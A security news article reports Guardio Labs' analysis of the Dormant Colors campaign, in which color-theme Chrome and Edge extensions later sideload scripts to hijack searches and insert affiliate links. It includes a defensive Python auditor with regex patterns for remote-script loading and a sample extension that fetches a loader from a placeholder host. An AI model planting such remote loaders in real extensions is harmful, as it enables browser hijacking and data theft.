Dormant Colors campaign operates over 1 million malicious Chrome extension installs

A new malvertising campaign, codenamed Dormant Colors, is delivering malicious Google Chrome extensions that hijack target browsers.

Researchers at Guardio Labs have discovered a new malvertising campaign called Dormant Colors designed to deliver malicious Google Chrome extensions.

Chrome extension hijacks search and inserts affiliate links into web pages.

Experts refer to this activity as Dormant Colors because the extensions offer color customization options.

“It started with a scheming malvertising campaign, continued with a clever new way to sideload really malicious code that no one noticed (until now!), and ended up stealing not only your search and browsing data, but also affiliations with 10,000 targeted sites—a capability that could easily be used for targeted spear phishing, account takeover, and credential extraction—all using this powerful network of millions of infected computers around the world!” reads the post by Guardio Labs.

By mid-October 2022, researchers found at least 30 variants of these extensions in the Chrome and Edge web stores.

The malicious browser extensions have surpassed one million installations.

Experts noticed that the Chrome extensions’ code did not initially contain malicious components; the malicious code snippets were added later.

The attack chain relies on malvertising messages designed to trick victims into clicking the install button (the researchers published a video demonstrating the lure).

After clicking the “OK” or “Continue” button, the victim is prompted to install the color-changing extension.

When these extensions are installed, they redirect users to various pages that sideload malicious scripts that modify browser behavior.

These extensions are able to hijack searches and return affiliate links as results. The scheme allows threat actors to earn revenue from traffic to these sites and steal data.

Experts note that these malicious extensions are more than simple search hijackers, because they include “stealth modules for code updates and telemetry collection, as well as server backbones that collect data from millions of users.” The collected data is used to classify potential targets and select the best social engineering attack vectors to target them and steal credentials.
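As an added illustration (not code from Guardio’s report or from the campaign itself), the following Python checker audits an unpacked browser extension directory for the two traits described above: host access to every site, and scripts that pull further code from a remote server rather than shipping it in the package. The manifest, script body and hostname are constructed samples.

```python
import json
import os
import re
import tempfile

# Constructed heuristics for the behaviour described above: broad host access
# combined with code that loads and runs scripts fetched from a remote server.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
REMOTE_LOAD_PATTERNS = [
    r"createElement\(\s*['\"]script['\"]\s*\)",   # injecting a <script> element
    r"\.src\s*=\s*['\"]https?://",                # pointing it at a remote host
    r"\beval\s*\(",                               # executing fetched text
]

def audit_extension(ext_dir):
    """Return a list of findings for one unpacked extension directory."""
    findings = []
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as f:
        manifest = json.load(f)
    hosts = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        hosts.update(cs.get("matches", []))
    if hosts & BROAD_HOSTS:
        findings.append("broad host access: " + ", ".join(sorted(hosts & BROAD_HOSTS)))
    for root, _, files in os.walk(ext_dir):
        for name in files:
            if not name.endswith(".js"):
                continue
            with open(os.path.join(root, name), encoding="utf-8", errors="replace") as f:
                src = f.read()
            for pat in REMOTE_LOAD_PATTERNS:
                if re.search(pat, src):
                    findings.append(f"{name}: remote-code pattern {pat!r}")
    return findings

def build_sample_extension():
    """Constructed sample (not a real campaign extension): a colour-theme content script that sideloads a remote loader."""
    d = tempfile.mkdtemp()
    manifest = {"manifest_version": 3, "name": "Sample Colors",
                "content_scripts": [{"matches": ["<all_urls>"], "js": ["theme.js"]}]}
    with open(os.path.join(d, "manifest.json"), "w", encoding="utf-8") as f:
        json.dump(manifest, f)
    with open(os.path.join(d, "theme.js"), "w", encoding="utf-8") as f:
        f.write("document.body.style.background='#222';\n"
                "var s=document.createElement('script');\n"
                "s.src='https://updates.example.invalid/loader.js';\n"   # constructed host
                "document.head.appendChild(s);\n")
    return d
```

Running `audit_extension(build_sample_extension())` reports the `<all_urls>` match plus the two remote-loading patterns in `theme.js`; a benign theme extension that only touches page styles triggers none of them.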

The Dormant Colors operation relies on affiliation with 10,000 target sites and uses a global network of millions of infected computers.

Attackers attach affiliate tags to URLs, and any purchases made on the site generate commissions for the operator.

The researchers released a video showing the affiliate hijacking of a shopping site: the address bar is populated with affiliate referral data that credits the operators.

The researchers warn that the same process can be used to redirect victims to phishing pages to steal credentials for popular services, including Microsoft 365, online banking, and social media platforms.

“This activity is still ongoing, shifting domains, generating new extensions, and reinventing more color and style changing features that you can definitely get away with. Beyond that, the code injection technique analyzed here is a method used to mitigate and circumvent the massive infrastructure and allows this campaign to be used for more malicious activities in the future.”

The report also includes the Indicators of Compromise (IoCs) for this campaign.

“At the end of the day, not only will your affiliate fee be charged, but your privacy and your internet experience are compromised here in ways that can be exploited by gaining credentials and hijacking accounts and financial data to target organizations. It’s worth it without any extensions that make a beautiful website look dark and ugly…”


Pierluigi Paganini
